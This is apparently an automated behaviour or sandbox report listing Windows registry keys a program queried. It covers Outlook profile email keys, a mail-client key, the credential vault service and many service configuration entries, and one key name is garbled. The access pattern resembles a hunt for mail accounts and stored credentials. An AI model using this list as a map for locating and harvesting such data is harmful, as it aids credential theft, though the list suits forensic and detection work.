HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x9d\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9e\xef\xbf\xbd\xd0\x8b\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Group
